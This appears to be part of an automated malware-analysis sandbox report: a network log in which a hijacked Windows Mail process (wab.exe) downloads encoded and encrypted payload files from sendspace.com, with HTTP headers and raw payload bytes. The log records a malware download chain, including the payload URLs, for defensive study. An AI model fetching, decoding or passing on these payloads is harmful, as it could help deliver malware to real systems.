                                                                                Host: fs03n4.sendspace.com
                                                                                Connection: Keep-Alive
                                                                                2024-05-23 18:12:43 UTC501INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Thu, 23 May 2024 18:12:42 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 465356
                                                                                Last-Modified: Wed, 22 May 2024 18:52:50 GMT
                                                                                Connection: close
                                                                                Set-Cookie: SID=fld9ac4eee7j84balm4926qe11; path=/; domain=.sendspace.com
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                Content-Disposition: attachment;filename="Semicylinder.psm"
                                                                                ETag: "664e3f02-719cc"
                                                                                Accept-Ranges: bytes
                                                                                2024-05-23 18:12:43 UTC15883INData Raw: 36 77 4c 75 48 75 73 43 57 33 53 37 74 4b 49 4e 41 4f 73 43 4a 31 35 78 41 5a 73 44 58 43 51 45 36 77 49 4a 62 58 45 42 6d 37 6b 6f 44 65 73 6b 36 77 4c 31 2f 4f 73 43 76 55 61 42 38 53 38 49 69 2f 66 72 41 68 66 46 36 77 4b 31 6b 34 48 70 42 77 56 67 30 33 45 42 6d 33 45 42 6d 33 45 42 6d 2b 73 43 69 6d 4f 36 6c 78 2f 46 4b 58 45 42 6d 2b 73 43 31 61 66 72 41 70 43 35 63 51 47 62 4d 63 70 78 41 5a 76 72 41 75 42 44 69 52 51 4c 36 77 4b 63 6e 58 45 42 6d 39 48 69 36 77 4b 52 30 65 73 43 36 6d 4b 44 77 51 54 72 41 70 6a 67 36 77 49 48 62 34 48 35 44 44 41 38 41 6e 7a 4a 36 77 4b 62 44 2b 73 43 56 42 2b 4c 52 43 51 45 63 51 47 62 63 51 47 62 69 63 50 72 41 6e 72 79 63 51 47 62 67 63 4e 70 36 6f 30 41 63 51 47 62 36 77 4a 7a 41 72 70 71 53 78 42 77 63 51 47
                                                                                Data Ascii: 6wLuHusCW3S7tKINAOsCJ15xAZsDXCQE6wIJbXEBm7koDesk6wL1/OsCvUaB8S8Ii/frAhfF6wK1k4HpBwVg03EBm3EBm3EBm+sCimO6lx/FKXEBm+sC1afrApC5cQGbMcpxAZvrAuBDiRQL6wKcnXEBm9Hi6wKR0esC6mKDwQTrApjg6wIHb4H5DDA8AnzJ6wKbD+sCVB+LRCQEcQGbcQGbicPrAnrycQGbgcNp6o0AcQGb6wJzArpqSxBwcQG
                                                                                2024-05-23 18:12:43 UTC16384INData Raw: 6d 59 71 67 7a 38 2f 78 54 30 6f 34 37 4b 4f 2f 65 34 69 48 4b 59 73 78 2b 30 67 73 79 48 53 41 66 42 38 73 44 50 53 47 55 2b 62 4c 2f 67 52 37 4e 70 6b 6b 4b 76 73 54 6a 47 54 6f 59 4c 50 68 4f 41 2f 57 57 62 5a 53 6a 31 45 36 59 4c 4d 68 42 2f 4f 61 52 62 59 7a 69 43 79 7a 35 2f 71 5a 6c 6e 61 51 70 63 55 64 76 53 63 79 77 39 35 33 36 68 31 75 7a 51 77 73 48 46 4c 37 62 70 62 65 6a 70 5a 4f 75 66 36 54 45 4a 76 61 49 50 34 4d 75 6a 57 51 48 63 37 62 73 73 62 51 59 57 76 79 70 41 76 61 2b 4c 53 54 46 67 65 53 6b 55 4c 76 59 57 72 49 54 78 73 38 73 44 73 67 77 46 46 56 47 4b 52 4b 54 55 63 79 2f 75 78 76 64 63 6a 55 39 2f 30 4a 6b 65 7a 31 71 75 78 75 36 66 6b 4d 51 39 35 4a 71 2f 65 4c 55 38 59 69 52 68 53 41 2b 56 31 74 4b 65 62 56 31 43 72 4a 31 38 4f
                                                                                Data Ascii: mYqgz8/xT0o47KO/e4iHKYsx+0gsyHSAfB8sDPSGU+bL/gR7NpkkKvsTjGToYLPhOA/WWbZSj1E6YLMhB/OaRbYziCyz5/qZlnaQpcUdvScyw9536h1uzQwsHFL7bpbejpZOuf6TEJvaIP4MujWQHc7bssbQYWvypAva+LSTFgeSkULvYWrITxs8sDsgwFFVGKRKTUcy/uxvdcjU9/0Jkez1quxu6fkMQ95Jq/eLU8YiRhSA+V1tKebV1CrJ18O
                                                                                2024-05-23 18:12:43 UTC16384INData Raw: 4c 6e 37 52 35 52 67 6a 53 44 74 63 37 6f 70 77 73 4a 76 41 4d 4f 54 43 71 2b 48 74 4b 67 4d 4b 33 51 48 33 75 68 4d 58 72 4d 6a 4c 2f 67 52 36 74 6c 37 49 32 62 56 4b 4a 6b 2f 35 6c 76 7a 58 74 5a 43 51 36 37 48 36 74 4f 75 78 2b 72 54 72 73 66 71 30 36 37 48 36 74 4f 75 78 2b 72 54 72 73 66 6a 59 54 59 62 37 58 35 30 30 39 2b 36 65 45 39 54 32 65 45 6a 70 78 6d 30 31 54 4c 44 37 49 55 52 67 49 72 50 63 34 59 2b 35 2b 72 62 4d 32 4c 43 61 76 74 58 79 74 4f 6f 51 34 49 34 4d 67 2f 34 45 65 4b 69 43 39 79 32 31 4b 69 57 6b 73 4a 47 71 37 32 46 70 38 31 52 2f 69 4a 49 38 59 66 36 30 36 76 63 65 6c 4f 51 4e 67 4c 4d 73 4c 55 65 75 51 62 59 39 4d 4a 70 76 2b 4c 4d 75 64 68 78 79 43 62 59 2f 53 38 6f 50 79 2b 36 5a 6c 6d 4b 77 30 63 66 74 2b 52 65 75 45 58 39
                                                                                Data Ascii: Ln7R5RgjSDtc7opwsJvAMOTCq+HtKgMK3QH3uhMXrMjL/gR6tl7I2bVKJk/5lvzXtZCQ67H6tOux+rTrsfq067H6tOux+rTrsfjYTYb7X5009+6eE9T2eEjpxm01TLD7IURgIrPc4Y+5+rbM2LCavtXytOoQ4I4Mg/4EeKiC9y21KiWksJGq72Fp81R/iJI8Yf606vcelOQNgLMsLUeuQbY9MJpv+LMudhxyCbY/S8oPy+6ZlmKw0cft+ReuEX9
                                                                                2024-05-23 18:12:43 UTC16384INData Raw: 76 49 43 30 36 35 79 77 58 57 38 7a 73 54 72 73 65 61 74 32 58 74 2f 39 66 54 65 59 63 51 4c 73 75 67 41 75 59 52 69 6b 78 73 77 74 33 75 71 65 4b 52 32 64 4a 2b 65 56 6b 31 70 6b 51 78 48 4b 75 6b 78 31 5a 72 4c 30 54 6b 55 67 4e 7a 6d 36 74 4a 2f 45 52 54 4c 77 77 50 50 69 55 38 4c 59 43 32 76 56 64 58 46 2f 52 70 49 71 4a 62 33 4a 2f 49 5a 58 56 74 69 30 57 38 66 74 75 4f 72 73 76 52 4a 38 69 71 76 39 75 75 31 6d 6d 6a 37 50 66 39 35 34 49 61 74 6b 7a 48 38 4e 48 42 48 5a 61 2b 72 6e 49 42 4c 41 57 62 47 64 73 5a 76 7a 5a 42 6a 6e 6b 79 75 42 76 59 65 4e 2f 74 51 62 73 66 71 30 36 37 48 36 74 4f 75 78 2b 72 54 72 73 66 71 30 36 37 48 36 74 4f 75 78 2b 72 61 71 59 61 36 70 38 44 64 61 64 78 4f 4e 2f 6e 63 6a 73 66 71 30 36 37 48 36 74 4f 75 78 2b 72 54
                                                                                Data Ascii: vIC065ywXW8zsTrseat2Xt/9fTeYcQLsugAuYRikxswt3uqeKR2dJ+eVk1pkQxHKukx1ZrL0TkUgNzm6tJ/ERTLwwPPiU8LYC2vVdXF/RpIqJb3J/IZXVti0W8ftuOrsvRJ8iqv9uu1mmj7Pf954IatkzH8NHBHZa+rnIBLAWbGdsZvzZBjnkyuBvYeN/tQbsfq067H6tOux+rTrsfq067H6tOux+raqYa6p8DdadxON/ncjsfq067H6tOux+rT
                                                                                2024-05-23 18:12:43 UTC16384INData Raw: 2f 77 43 68 71 69 79 61 7a 67 4b 76 5a 75 4b 42 4f 72 55 6c 44 4c 4b 32 4e 50 2b 58 4c 75 54 69 4b 2b 32 39 67 45 43 64 68 66 4d 70 69 54 55 63 57 5a 54 79 63 78 34 52 6c 6e 48 34 69 4c 39 54 31 41 50 37 41 56 4a 6c 4a 47 59 37 76 4f 4e 48 79 2b 33 4e 69 6b 70 73 53 62 46 4a 57 50 75 62 53 2f 31 76 36 4f 61 39 59 75 77 4c 64 61 54 59 6e 39 37 4d 58 67 73 44 65 7a 39 75 77 51 31 58 32 4c 74 6e 70 79 55 45 47 38 65 39 49 61 39 6a 41 43 46 70 78 65 71 77 56 35 4a 79 57 67 6d 51 45 32 4b 77 36 37 50 63 34 67 4f 31 2b 72 57 31 54 34 4a 2b 62 32 66 39 61 59 78 73 38 66 4c 73 62 56 71 76 5a 43 50 65 61 5a 4a 2f 61 33 38 6e 32 52 4d 53 56 72 6b 63 63 76 73 37 4e 48 33 7a 4e 54 74 79 69 71 70 75 4e 43 33 30 77 4f 56 57 32 43 31 4a 67 47 4c 6e 79 67 43 2f 6a 57 65
                                                                                Data Ascii: /wChqiyazgKvZuKBOrUlDLK2NP+XLuTiK+29gECdhfMpiTUcWZTycx4RlnH4iL9T1AP7AVJlJGY7vONHy+3NikpsSbFJWPubS/1v6Oa9YuwLdaTYn97MXgsDez9uwQ1X2LtnpyUEG8e9Ia9jACFpxeqwV5JyWgmQE2Kw67Pc4gO1+rW1T4J+b2f9aYxs8fLsbVqvZCPeaZJ/a38n2RMSVrkccvs7NH3zNTtyiqpuNC30wOVW2C1JgGLnygC/jWe
                                                                                2024-05-23 18:12:43 UTC16384INData Raw: 79 54 56 61 37 33 39 2f 63 49 32 62 36 55 31 7a 56 70 43 77 4a 4d 39 42 77 61 6d 31 39 39 61 63 75 74 69 7a 42 65 51 35 75 49 39 42 68 61 72 2f 2f 66 4b 30 36 69 54 38 34 76 57 69 6c 4c 49 2f 2f 66 4b 30 36 5a 46 64 75 64 47 33 4c 76 6a 6a 73 66 6c 62 48 53 68 49 73 6c 2f 39 38 72 54 72 2f 36 31 32 66 31 61 33 75 78 57 46 74 72 7a 72 73 43 31 71 2b 41 7a 33 4c 75 78 61 5a 30 4c 38 38 75 61 36 47 34 36 73 42 58 47 32 46 65 75 56 74 54 61 30 77 47 65 64 62 2f 34 76 2f 72 6c 4a 70 42 77 4f 37 78 38 53 75 33 2b 55 59 4c 4d 58 49 46 38 73 44 4c 66 39 75 4b 4c 78 68 72 72 73 48 63 50 30 6c 37 78 67 73 78 41 73 44 62 72 47 77 57 71 6e 39 37 31 42 6d 6e 76 44 36 62 62 76 66 64 2f 30 74 6d 66 70 4c 75 39 2b 41 2f 4a 48 50 4c 52 59 38 71 66 79 2f 75 78 65 41 72 54
                                                                                Data Ascii: yTVa739/cI2b6U1zVpCwJM9Bwam199acutizBeQ5uI9Bhar//fK06iT84vWilLI//fK06ZFdudG3LvjjsflbHShIsl/98rTr/612f1a3uxWFtrzrsC1q+Az3LuxaZ0L88ua6G46sBXG2FeuVtTa0wGedb/4v/rlJpBwO7x8Su3+UYLMXIF8sDLf9uKLxhrrsHcP0l7xgsxAsDbrGwWqn971BmnvD6bbvfd/0tmfpLu9+A/JHPLRY8qfy/uxeArT
                                                                                2024-05-23 18:12:43 UTC16384INData Raw: 2b 48 59 6a 72 76 2b 5a 34 50 71 54 38 4c 5a 78 74 76 61 45 2b 37 48 34 6b 4f 59 53 54 33 79 36 34 63 5a 31 4e 43 48 36 74 4f 75 78 2b 72 54 72 73 66 71 30 36 37 48 36 74 4f 75 78 2b 72 54 72 73 66 71 30 36 63 4a 6e 41 6d 42 67 70 64 45 78 33 59 4d 59 41 44 2f 2b 42 48 69 52 79 45 7a 5a 74 53 6f 6b 69 4b 79 77 57 75 2b 68 61 72 6d 55 58 66 66 79 44 64 52 6b 49 77 6d 32 58 72 30 6f 4b 6e 79 7a 4c 6d 5a 4f 45 6e 32 32 50 6d 73 6c 79 2b 43 7a 54 4f 5a 61 6b 44 37 72 69 4a 4e 7a 74 63 44 42 63 31 59 37 62 4e 5a 48 62 54 57 43 7a 77 36 64 4a 4b 76 63 57 42 47 56 70 35 53 56 68 39 38 32 75 64 65 4d 5a 6f 67 66 6f 4b 79 5a 45 70 41 68 62 62 59 53 74 65 31 51 55 38 37 38 6e 4a 31 4a 50 7a 48 47 72 4c 35 64 2b 72 54 72 73 66 71 30 36 37 48 36 74 4f 75 78 2b 72 54
                                                                                Data Ascii: +HYjrv+Z4PqT8LZxtvaE+7H4kOYST3y64cZ1NCH6tOux+rTrsfq067H6tOux+rTrsfq06cJnAmBgpdEx3YMYAD/+BHiRyEzZtSokiKywWu+harmUXffyDdRkIwm2Xr0oKnyzLmZOEn22Pmsly+CzTOZakD7riJNztcDBc1Y7bNZHbTWCzw6dJKvcWBGVp5SVh982udeMZogfoKyZEpAhbbYSte1QU878nJ1JPzHGrL5d+rTrsfq067H6tOux+rT
                                                                                2024-05-23 18:12:43 UTC16384INData Raw: 30 50 31 4b 33 37 58 79 74 4f 70 6e 6c 37 4c 47 5a 58 76 75 45 54 4c 34 6c 70 6d 32 51 74 42 4b 33 72 69 7a 55 75 64 53 55 78 57 32 34 59 79 6a 67 54 66 32 6d 5a 5a 36 73 43 6e 46 47 62 55 66 45 57 30 52 51 39 31 74 4a 59 67 56 42 44 52 46 4c 5a 39 42 2b 7a 4d 44 67 42 55 6a 67 51 75 6a 5a 6e 44 4c 61 6f 6d 4f 78 6e 4c 51 32 4d 51 49 62 6e 57 56 53 35 54 45 74 77 50 38 6d 6c 50 75 79 39 78 6a 4e 37 58 36 74 73 79 49 6f 4a 6f 38 62 66 36 30 36 34 30 77 44 6f 2b 78 2b 72 54 72 73 66 71 30 36 37 48 36 74 4f 75 78 2b 72 54 72 73 66 71 30 36 37 48 36 74 70 46 56 56 35 6b 6a 58 56 37 51 79 62 53 64 4a 79 74 57 63 4a 4b 63 78 66 36 30 36 5a 59 33 2b 73 58 47 6a 72 44 72 73 6c 67 30 61 37 48 37 38 67 32 5a 65 77 4a 31 74 6a 33 6e 66 4c 52 59 73 79 34 34 58 66 61
                                                                                Data Ascii: 0P1K37XytOpnl7LGZXvuETL4lpm2QtBK3rizUudSUxW24YyjgTf2mZZ6sCnFGbUfEW0RQ91tJYgVBDRFLZ9B+zMDgBUjgQujZnDLaomOxnLQ2MQIbnWVS5TEtwP8mlPuy9xjN7X6tsyIoJo8bf60640wDo+x+rTrsfq067H6tOux+rTrsfq067H6tpFVV5kjXV7QybSdJytWcJKcxf606ZY3+sXGjrDrslg0a7H78g2ZewJ1tj3nfLRYsy44Xfa
                                                                                2024-05-23 18:12:43 UTC16384INData Raw: 2f 78 61 44 70 4d 4f 55 73 79 5a 5a 6c 36 44 4e 74 76 56 31 77 31 68 34 73 30 59 74 73 65 63 69 39 34 69 54 62 37 57 63 77 76 78 4d 48 6a 4e 64 6e 52 5a 35 32 41 6d 75 46 70 2b 44 50 6d 46 69 43 72 55 44 6b 30 50 58 7a 78 73 64 34 72 68 5a 39 2b 61 58 55 75 7a 76 6a 73 74 67 31 4b 65 71 31 2b 6d 78 68 75 38 48 52 5a 4e 4b 6b 4c 4d 31 74 75 63 79 49 62 59 6e 64 46 39 74 6b 4c 4d 32 71 66 73 56 49 5a 58 6c 46 4d 41 67 6c 4e 44 58 61 49 30 4b 30 6d 6f 71 4a 67 59 46 4d 74 4b 54 73 74 67 62 4e 73 55 50 52 76 61 31 51 6c 35 32 70 70 35 4a 35 38 2f 6e 47 6c 49 2b 4f 6c 44 50 66 4a 58 45 61 43 67 6e 76 5a 53 76 35 72 54 37 73 66 67 4b 6a 35 45 54 2b 67 55 45 4e 35 48 4a 74 6a 64 4a 78 30 70 6f 73 79 65 47 62 32 70 5a 6c 62 61 6d 32 70 6a 5a 63 79 4c 48 4f 31 46
                                                                                Data Ascii: /xaDpMOUsyZZl6DNtvV1w1h4s0Ytseci94iTb7WcwvxMHjNdnRZ52AmuFp+DPmFiCrUDk0PXzxsd4rhZ9+aXUuzvjstg1Keq1+mxhu8HRZNKkLM1tucyIbYndF9tkLM2qfsVIZXlFMAglNDXaI0K0moqJgYFMtKTstgbNsUPRva1Ql52pp5J58/nGlI+OlDPfJXEaCgnvZSv5rT7sfgKj5ET+gUEN5HJtjdJx0posyeGb2pZlbam2pjZcyLHO1F
                                                                                2024-05-23 18:12:43 UTC16384INData Raw: 74 51 41 6d 52 51 71 43 53 30 54 59 35 6e 38 4b 70 51 49 56 63 61 67 2b 64 38 2f 73 67 49 50 5a 37 41 55 66 73 71 76 37 7a 50 76 69 42 41 4e 62 57 34 32 74 67 4b 2f 74 39 4f 2b 78 2b 2f 50 49 51 71 43 79 2f 50 48 2b 74 4f 6d 73 31 6b 79 70 74 30 33 30 37 37 48 34 37 76 47 47 48 4c 49 38 38 66 36 30 36 72 66 4d 41 6c 79 44 51 5a 6a 73 48 2f 4e 7a 55 53 66 6f 6b 6a 59 4c 43 35 72 77 61 50 2b 50 35 52 6c 2b 65 67 43 33 32 51 71 48 6f 37 67 64 2f 39 65 71 72 54 72 73 77 61 69 53 63 4a 6c 79 6d 55 43 56 2f 41 57 6d 75 72 44 72 73 63 53 6c 6d 37 58 36 74 73 32 6e 36 72 44 72 73 73 73 76 67 4d 79 64 35 6d 6e 65 6c 73 48 67 68 63 75 4d 55 6c 5a 63 70 6b 4b 74 49 70 56 4c 77 49 72 57 44 65 43 6a 76 73 69 66 47 65 4e 2f 37 38 6d 46 38 59 59 64 33 42 68 68 39 66 4c
                                                                                Data Ascii: tQAmRQqCS0TY5n8KpQIVcag+d8/sgIPZ7AUfsqv7zPviBANbW42tgK/t9O+x+/PIQqCy/PH+tOms1kypt03077H47vGGHLI88f606rfMAlyDQZjsH/NzUSfokjYLC5rwaP+P5Rl+egC32QqHo7gd/9eqrTrswaiScJlymUCV/AWmurDrscSlm7X6ts2n6rDrsssvgMyd5mnelsHghcuMUlZcpkKtIpVLwIrWDeCjvsifGeN/78mF8YYd3Bhh9fL


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549713104.21.28.804431272C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-05-23 18:13:16 UTC175OUTGET /pro/dl/12acii HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Host: www.sendspace.com
                                                                                Cache-Control: no-cache
                                                                                2024-05-23 18:13:16 UTC944INHTTP/1.1 301 Moved Permanently
                                                                                Date: Thu, 23 May 2024 18:13:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: SID=3n1k50ohec2v6n8nvd1o04nn84; path=/; domain=.sendspace.com
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                Pragma: no-cache
                                                                                Location: https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin
                                                                                Vary: Accept-Encoding
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxPV4sQnCPDX9vveTQJAXHa3z9FATng3NF0BXGbXRwz3rV%2BLoBboTK3R%2FAJTf3nBEXEu%2Bt6Fq2e8VGaa5lVqNLFRXNBVzJK0QaglzbhEv6Gc%2FkSwomVPPzMf3gMvmV5Qo9rChw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 888704d9af6d43cb-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-05-23 18:13:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.54971469.31.136.574431272C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-05-23 18:13:17 UTC300OUTGET /dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Cache-Control: no-cache
                                                                                Host: fs13n1.sendspace.com
                                                                                Connection: Keep-Alive
                                                                                Cookie: SID=3n1k50ohec2v6n8nvd1o04nn84
                                                                                2024-05-23 18:13:18 UTC425INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Thu, 23 May 2024 18:13:17 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 87616
                                                                                Last-Modified: Wed, 22 May 2024 18:51:30 GMT
                                                                                Connection: close
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                Content-Disposition: attachment;filename="aLnQbzJIDX45.bin"
                                                                                ETag: "664e3eb2-15640"
                                                                                Accept-Ranges: bytes
                                                                                2024-05-23 18:13:18 UTC15959INData Raw: 2a 86 84 0c 4a f6 f3 dc 77 95 cd 99 7d df 3c 1d c4 51 30 53 ba 1a e7 cc 31 45 7b b5 e7 b9 c2 d3 55 99 ed 70 0f df e7 9d ab 6b 4f 25 ab 4c 52 51 3a f4 e1 98 d1 ca f8 92 fb 68 02 40 bf 77 33 ba bf 3d eb f4 01 be 84 8c ff d0 66 3f e1 d4 9d fc 4d 5a a8 de fc 31 61 a0 87 9b 6d 18 17 42 02 ec 5e bd 6a 8b d6 d5 54 a2 98 1c a6 df 66 3d 05 b6 37 77 35 55 f3 bc 06 a2 db 34 52 04 5f d0 df c6 a3 75 52 5f 56 c7 98 6e d1 46 78 37 9a e4 bf 17 b0 b8 ee 28 a9 18 bf 4d 7c 96 c8 19 67 50 ab ea 31 49 f6 a0 da 81 9e f8 78 80 1c 13 14 9d b2 20 3b f2 e2 23 da 56 3e e5 10 ae 8f 44 c5 eb 8b 18 02 04 4e 76 40 8d 41 a1 67 1d 4b fa 00 dd 32 e8 80 dc 49 af 07 42 df c8 a2 45 d6 d2 96 b4 74 6c c0 1a de cf 5b 90 77 fa b4 bf d0 cb 6e d1 92 7b 5d b1 c3 cd d5 22 eb 6f 65 7c e0 4c c0 00 81
                                                                                Data Ascii: *Jw}<Q0S1E{UpkO%LRQ:h@w3=f?MZ1amB^jTf=7w5U4R_uR_VnFx7(M|gP1Ix ;#V>DNv@AgK2IBEtl[wn{]"oe|L
                                                                                2024-05-23 18:13:18 UTC16384INData Raw: ba cd a4 d3 b7 4e 9c b5 8c 9b 9e d6 67 e0 e8 03 37 cd 51 29 c4 b1 d6 50 5f 8f cb 91 9e 83 aa 79 22 8a bb 10 2f 4a 22 79 8e 32 4d c6 80 54 f4 8d 10 80 0a 56 32 09 4f e6 5c 64 26 1f 95 ec f3 d1 33 0d d1 dd 40 70 77 b8 8d cd f1 a1 90 bd a1 fd 27 78 1f 26 fb 51 c1 1f 00 f8 90 d6 07 77 42 88 0b 37 e2 9e 73 52 6e 8c 0f e5 39 8a 11 89 60 2e 18 14 62 a2 ba ad 46 7d 70 a3 b6 9c 97 a9 3a 9a 68 d5 90 a4 86 b0 53 59 ed 72 32 2b 6b 16 1f 8b eb c7 17 bd f8 4f b9 e8 aa de b3 ea d9 c7 5a c9 41 4f 21 8a 83 6b f8 86 ab 6a 99 5c a8 df b9 1f d6 82 2a f5 4f 40 1b e3 b7 47 6d 25 97 62 d2 c8 21 80 79 17 9e f5 41 7c ff b1 97 98 d3 01 3c ea 48 b8 e0 08 b0 82 ad 2d fb 49 62 2f f1 3f 1c d5 3d 4e a1 a8 d6 4f 95 80 5d 35 31 48 12 e6 8b 3c a3 40 83 4b 61 28 2d c1 09 0a 12 9c e4 1f 52
                                                                                Data Ascii: Ng7Q)P_y"/J"y2MTV2O\d&3@pw'x&QwB7sRn9`.bF}p:hSYr2+kOZAO!kj\*O@Gm%b!yA|<H-Ib/?=NO]51H<@Ka(-R
                                                                                2024-05-23 18:13:18 UTC16384INData Raw: a3 cd 05 79 9a 21 fa 23 e4 64 f4 6d 90 dd 2d 7a 63 ad 43 46 5d 9e 1c 41 45 88 06 92 a1 45 6b 9b c5 f4 36 40 14 d2 89 e6 e5 56 16 0b f1 17 da a1 0c 34 d2 4f 05 82 ab 4f 72 48 7e 93 c3 de 86 c8 73 b8 98 af dd d1 1e 8b 7b 98 30 b2 ff 7b 43 a9 65 fb 36 e0 00 7d d4 1f 82 d6 91 df 5a 46 bc c0 c7 46 53 0b c6 b5 a8 aa 48 92 17 80 ce 83 d1 f6 a3 99 11 58 f2 22 f8 87 ae 77 74 6e 34 9c f7 5b 85 ce 9d 5f b6 50 ab ac c8 e0 95 78 3a 2d 72 be 7e 38 37 c1 e0 03 52 23 67 1e 05 8a 5e e4 e9 94 6b 4b 0d d7 d5 14 57 43 8f 13 07 1f 2a d4 78 2d f1 90 5e 30 06 76 b0 32 82 6e 57 ca f7 24 84 b7 9d 02 f4 fa f5 7a da 31 c4 28 24 fb c7 0e 53 76 1f 84 db bd 2f d6 56 5c 61 21 37 7c 3b ff 75 d7 5f 34 1c 7c 76 26 cb d3 75 fd 44 0f eb 39 9d 9c 67 72 80 14 d2 9b 6d be 84 8c fb 97 0c 4b 5d
                                                                                Data Ascii: y!#dm-zcCF]AEEk6@V4OOrH~s{0{Ce6}ZFFSHX"wtn4[_Px:-r~87R#g^kKWC*x-^0v2nW$z1($Sv/V\a!7|;u_4|v&uD9grmK]
                                                                                2024-05-23 18:13:18 UTC16384INData Raw: 42 41 e1 fe ab 0c 41 0b f5 91 ac e8 a3 0c 3b b6 2f 1c fb 92 7b 1c 38 b2 76 9f 43 3d 1a e5 7a 80 de cd 44 cc 45 d4 5a fc 26 e2 6e 0b d7 95 69 be 23 dd 56 e5 fc 3d 7f 4d 50 45 ba d3 12 69 79 0b f3 5a 18 62 24 74 0e c8 0d 8a 80 6b bc f8 f8 ed 6e 83 5e d5 f6 ce da 48 35 b9 35 85 c9 9c a7 b3 55 52 68 1f 9f 66 f6 53 7b 80 71 fb 1f 16 f7 e4 f9 78 d0 e6 65 ae e9 50 0c 42 ce 1c fd 04 63 ee e4 76 dd 95 82 c2 17 92 ec db 70 b5 f3 49 2f d1 e2 d3 68 ae 70 c7 b1 b1 1b 0a 49 51 97 2c c3 82 53 e1 6f 86 b6 56 98 cc 8b 21 f8 19 6b 8f fc 22 5e e7 c3 02 10 ef ee 2a fe 30 6e 1f 33 c1 f4 93 f1 01 b0 10 6e 3a c6 77 2b 46 85 ac de 98 9b 3b ba d6 02 12 2a 0e d2 ed f3 9e 2f e7 9e f8 ff fc 6d 2b 41 df c5 05 bd fa cb 31 29 b2 2f b2 17 9a b5 8c 15 a5 7f 59 09 aa 19 22 da d6 b8 5e c0
                                                                                Data Ascii: BAA;/{8vC=zDEZ&ni#V=MPEiyZb$tkn^H55URhfS{qxePBcvpI/hpIQ,SoV!k"^*0n3n:w+F;*/m+A1)/Y"^
                                                                                2024-05-23 18:13:18 UTC16384INData Raw: f6 84 8c fb d0 e8 3f 4c 37 92 fe b3 5a e2 fa fc 31 61 a0 41 9b 95 0b 02 40 45 ec 01 99 6a 8b d6 d5 d2 a2 5a 1c bc dd 2e 3d e5 fe 37 77 35 55 75 bc b0 a2 c4 36 1b 04 d7 98 df c6 19 65 d4 51 9c 60 b2 a1 b9 fe 49 31 57 c5 2f 87 62 d0 85 42 ae 6a 84 22 6f c0 a9 74 47 3d 58 99 f7 7f bf c7 b3 f3 2f dc 58 f5 72 77 f7 ef 35 61 63 9e 9b 11 52 78 1a d2 10 ae 09 44 e9 e8 bd 1a 48 04 d4 52 40 8d 41 a1 e1 1d 67 f9 3c df 7e e8 f4 97 49 af 07 42 59 c8 35 53 94 d0 d8 b4 b8 27 c0 1a de cf dd 90 1c fc f6 bd 9f cb 76 9d 92 7b 5d b1 45 cd ed 3b 37 6e 35 7c 50 68 c0 00 81 7c 75 8e 72 8d 67 ad c0 50 5d ce 4d 4e 67 37 d3 21 c0 73 61 06 0a 33 08 1a cb 07 37 95 fe 7e 04 32 94 3a 05 b2 0f 15 98 1e af 92 38 31 7b eb 29 bc 57 86 78 5f 6f 06 60 60 0c 78 b0 7b 7f cf 4c ba 24 da c6 67
                                                                                Data Ascii: ?L7Z1aA@EjZ.=7w5Uu6eQ`I1W/bBj"otG=X/Xrw5acRxDHR@Ag<~IBY5S'v{]E;7n5|Ph|urgP]MNg7!sa37~2:81{)Wx_o``x{L$g
                                                                                2024-05-23 18:13:18 UTC6121INData Raw: ad 7a 22 bf a4 a8 5d 95 57 2f ab 3e a0 c2 d3 11 d9 4a 7d 84 ab f3 07 62 52 bb e4 57 03 9d f4 70 45 01 64 98 74 0e 61 37 fe ce 9b 68 27 71 f4 39 cb 89 69 e5 db 82 a7 9c 7e d7 3c 28 90 ee ae 4e 7d 84 36 54 c7 3f 41 8a 36 cf 7f 5d 5c bf 37 58 8d ef c7 e3 19 b1 7d 02 1f 7d ef de 59 1c f8 1a 00 46 40 41 de a3 d0 8f ec 5e 74 d3 d8 ae 33 99 95 cf 4a 49 b1 79 bd ff e5 71 5c 64 43 8d ab 05 97 39 b7 4e 91 d9 db 4a b1 24 1f 4a 21 39 2e 60 a1 1e 9e 83 65 08 01 6b 12 1e 8e 42 52 94 d7 fe a9 f7 50 aa 23 d2 d7 b7 73 28 ef 2b 88 35 24 70 aa 64 b6 9e 70 13 17 7d 5c 37 d6 3f 6b 1c a3 db 40 6d f8 3a b1 79 56 2d b2 a9 32 ef b6 74 ac 34 a1 20 c6 e1 36 15 80 2e 54 20 69 a9 07 6d 85 57 78 c9 4d bf a4 cc 43 00 63 da 08 3f b8 d0 e7 1f 31 ee 73 fb 03 